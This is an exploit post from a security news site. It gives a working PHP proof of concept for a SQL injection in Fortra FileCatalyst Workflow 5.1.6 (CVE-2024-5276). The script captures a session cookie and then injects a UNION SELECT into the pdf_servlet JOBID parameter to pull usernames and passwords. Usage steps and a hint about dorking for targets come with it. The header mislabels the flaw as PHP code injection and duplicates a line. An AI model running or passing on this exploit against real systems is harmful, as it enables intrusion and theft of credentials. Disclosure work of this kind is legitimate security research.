Get Rid of Ads!

Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Fortra FileCatalyst Workflow 5.1.6 Build 135 SQL Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 51
=============================================================================================================================================
| # Title : Fortra FileCatalyst =============================================================================================================================================
| # Title : Fortra FileCatalyst Workflow v5.1.6 Build 135 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.fortra.com/fr/lignes-de-produit/filecatalyst |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: The code extracts the JSESSIONID first and then uses it to perform SQL Injection.

( https://packetstorm.news/files/id/180866/ CVE-2024-5276)

[+] save code as poc.php.

[+] Set Target : line 48 + 120

[+] USage : php poc.php

[+] PayLoad :

<?php

class SessionExtractor {
private $target;
private $userAgent;
private $jsessionid;

public function __construct($target) {
$this->target = rtrim($target, '/');
$this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
}

private function sendRequest($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, $this->userAgent);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$response = curl_exec($ch);

if (curl_errno($ch)) {
die("cURL Error: " . curl_error($ch));
}

curl_close($ch);
return $response;
}

public function getSessionId() {
echo "[*] Attempt to extract JSESSIONID...\n";
$response = $this->sendRequest("{$this->target}/workflow/");

if (preg_match('/Set-Cookie:\s*JSESSIONID=([^;]+)/i', $response, $matches)) {
$this->jsessionid = trim($matches[1]);
file_put_contents("session.txt", $this->jsessionid);
echo "[+] Extracted JSESSIONID: {$this->jsessionid}\n";
return $this->jsessionid;
} else {
die("[-] JSESSIONID not found. Check the link.\n");
}
}
}

$extractor = new SessionExtractor('https://ADD_TARGET_HERE/');
$jsessionid = $extractor->getSessionId();

class Indoushka {
private $target;
private $userAgent;
private $jsessionid = null;

public function __construct($target) {
$this->target = rtrim($target, '/');
$this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
}

private function sendRequest($url, $headers = []) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_FOLLOWLOCATION => true, // ???? ?????????
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_USERAGENT => $this->userAgent,
CURLOPT_HTTPHEADER => $headers
]);

$response = curl_exec($ch);
if (curl_errno($ch)) {
die("CURL Error: " . curl_error($ch));
}
curl_close($ch);

return $response;
}

public function getSessionId() {
if ($this->jsessionid) {
echo "[*] JSESSIONID already extracted: {$this->jsessionid}\n";
return;
}

echo "[*] Attempting to extract JSESSIONID...\n";
$response = $this->sendRequest("{$this->target}/workflow/");

if (preg_match('/Set-Cookie:\s*JSESSIONID=([^;]+)/i', $response, $matches)) {
$this->jsessionid = trim($matches[1]);
echo "[+] JSESSIONID extracted: {$this->jsessionid}\n";
} else {
die("[-] JSESSIONID not found. Check the link.\n");
}
}

public function injectSQL($payload) {
if (!$this->jsessionid) {
die("[-] No session ID found. Run getSessionId() first.\n");
}

echo "[*] Sending SQL Injection payload...\n";

$url = "{$this->target}/workflow/pdf_servlet?JOBID=" . urlencode($payload);
$headers = ["Cookie: JSESSIONID={$this->jsessionid}"];
$response = $this->sendRequest($url, $headers);

if (strpos($response, "Success") !== false || strpos($response, "Admin") !== false) {
echo "[+] SQL Injection executed successfully!\n";
} else {
echo "[-] SQL Injection failed. Check input validity.\n";
}
}
}

// ????? ?????
$injector = new Indoushka('https://ADD_TARGET_HERE/');
$injector->getSessionId();

// ????? ?????
$payload = "' UNION SELECT username, password FROM users --";

$injector->injectSQL($payload);
?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================